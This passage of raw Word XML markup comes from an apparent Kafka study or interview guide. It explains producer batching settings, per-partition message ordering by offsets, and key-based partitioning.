    <w:p w14:paraId="5CDEE9DD"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Determines the total amount of memory available to the producer for buffering. If the buffer is full, the producer will block until space becomes available or an error is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE9C86"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uffer.memory allows the producer to accumulate more messages and handle bursts in message traffic without blocking, improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187A755"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Kafka. This directly affects how many messages can be batched together and sent at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B3C05"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atch.size improves throughput but may introduce some latency due to waiting to fill the batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA8B58"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is configures how long the producer will wait before sending a batch, even if the batch is not full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B08ECE"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increases the likelihood of the producer batching more messages together, improving throughput but potentially introducing higher latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E633487"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8EC91B">
          <v:rect id="_x0000_i3436" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2E1A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clusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7AFDE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29229637"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fewer requests to the broker, better handling of burst traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE98928"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for individual messages, potential memory consumption issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FA0D1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409513C"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quicker response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E466F"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throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, higher network traffic, and more frequent batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60EFC8"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437" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94BC17" w14:textId="01454226"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59" w:name="_Toc197868073"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Kafka handle message ordering within a partition</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="859"/>
    </w:p>
    <w:p w14:paraId="1B83CDDE" w14:textId="2273B4E7" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE"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 Ordering in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D6FC7"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within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by guaranteeing that messages within a single partition are delivered in the exact order in which they were produced. However, this guarantee is only valid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and not across multiple partitions. Here's how Kafka handles message ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935ECA0"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9F6D1">
          <v:rect id="_x0000_i3438" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C38CF8"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Ordering Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03CD94"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Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a producer sends messages to Kafka, it can specify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to which the message should be sent. If no specific partition is specified, Kafka uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioner</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the appropriate partition for the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2652F"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Kafka guarantees that messages sent to the same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same order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ly</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each message in Kafka is assigned a unique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E649B">
          <v:rect id="_x0000_i3439" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75092C69"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Partition Key and Message Distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9C12F"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Kafka producers can provide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Kafka uses a </w:t>
      </w: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mechanism to determine which partition a message will be sent to. This ensures that messages with the same key will always go to the same partition, preserving their order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEAECC"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A63606">
          <v:rect id="_x0000_i3440" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE49F06"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Ordering Between Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB59DFE"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messages are written to two partitions (P1 and P2) in the following order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAE595"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7BD675D1"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6D72DA52"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artitions,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was produced later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E5E51"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341FF">
          <v:rect id="_x0000_i3441" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5443D"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Behavior and Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6977807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Consumer per Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To ensure message ordering, each partition should be consumed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a consumer group. If multiple consumers consume the same partition, they will violate </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kafka's ordering guarantee because multiple consumers cannot read the same partition's messages simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888712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Offset Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka consumers track their position using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7A7DB">
          <v:rect id="_x0000_i3442" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A889F93"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065E89C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a Kafka topic with two partitions (P1, P2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8FDD8" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 sends messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F4426"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136493D"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3AA45E0F"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within Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9486E"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1 will consume </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg1, Msg2, Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this exact order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C7BC7"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2 will consume </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg4, Msg5</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this exact order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C556A3"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across Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9980C8"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1 and P2, it will consume the messages independently from each partition, and the order of the messages between the two partitions might not be guaranteed.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first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE6322"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F5CB2">
          <v:rect id="_x0000_i3443" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DC71A"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Ordering Guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ABE950"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thin a Single Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka guarantees that messages are consumed in the same order they were written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E229D18"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Multiple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message ordering across partitions. Messages from different partitions can be consumed out of order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1854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preserve ordering across partitions, the producer must ensure that related messages (with the same key or data) are sent to the same partition. This is often referred to as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0100ADB4" w14:textId="0463B56B" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0023377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07C6BFF0">
          <v:rect id="_x0000_i3444" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="121482B9" w14:textId="32CC1C1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0" w:name="_Toc197868074"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how Kafka ensures message order within a partition and the implications of partitioning on message order</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="860"/>
    </w:p>
    <w:p w14:paraId="12C09632" w14:textId="2B838ED1" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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Message Ordering within a Partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EA873"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 within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by maintaining strict sequence consistency for messages within that partition. Here’s how Kafka achieves this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A104AA"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43361">
          <v:rect id="_x0000_i3445" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="593CD323"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Message Ordering Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CC1CE"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Sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka guarantees that messages written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exact order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> they were produced. This is because each message is assigned a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Each message in Kafka is assigned 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which is a sequential, unique number within a partition. The offset helps track which messages have been processed by the consumer. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23653217"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1 has offset 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F4F74"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2 has offset 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D810B3"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3 has offset 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33056AB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messages in the order of the offset. If a consumer reads from offset 0, it will receive </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg2</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then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preserving the order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC819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83E549">
          <v:rect id="_x0000_i3446" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="336563A4"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Kafka Achieves Message Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC4AF1"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and Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a producer sends messages to a Kafka topic, it determines the partition for each message. This can be done based on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or the default partitioning strategy (round-robin or hash-based). If multiple messages with the same key are produced, they will be sent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thus preserving order for those related messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3DA84"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Once the messages are sent to a particular partition, Kafka stores them in the order they are received. Since Kafka ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all messages in a partition are ordered by their offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it guarantees that consumers will read them in the same sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2C10F"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 Reading Order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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FFDB37">
          <v:rect id="_x0000_i3447" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB4D9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mplications of Partitioning on Message Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CA3E0"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Kafka guarantees message ordering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partitioning introduces complexity when it comes to message ordering </w:t>
      </w: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Here are the key implications of partitioning on message order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147922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9A194">
          <v:rect id="_x0000_i3448" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BFC555"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 Ordering Within a Partition (Maintained):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05020076"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uarantee</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maintains message order within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning the messages are consumed in the same order they were produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D85348"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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This guarantees that applications that need to process messages in a specific sequence (such as logs, event timelines, or transactions) can rely on Kafka to maintain that order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFD5A2"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86103">
          <v:rect id="_x0000_i3449" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB397F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 Ordering Across Partitions (Not Guaranteed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8EE91"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does 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 Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka ensures ordering only within a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but if messages are produced to different partitions, the order is not guaranteed. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D1847"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1D4943CC"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1EBAA11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consumer group may consume messages from both partitions in parallel.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78C27067"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E9D69">
          <v:rect id="_x0000_i3450" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F0E16"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 Key-Based Partitioning (Preserves Order for Related Data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC46C6" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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that related messages maintain their order across multiple messages, Kafka allows producers to specify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The producer can use this key to ensure that all messages with the same key go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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723D92B"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example, if you have messages related to a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user ID</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the key, all messages for that user will go to the same partition, ensuring that these messages are ordered correctly for that user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F2C26"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is useful in scenarios like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you need to ensure that events for a specific entity (e.g., user or order) are processed in order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D8C5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69B682">
          <v:rect id="_x0000_i3451" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DEAE77"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actical Considerations of Partitioning and Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7ED89"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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka partitions allow </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by enabling multiple consumers to consume messages from different partitions concurrently. This helps Kafka achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput and parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
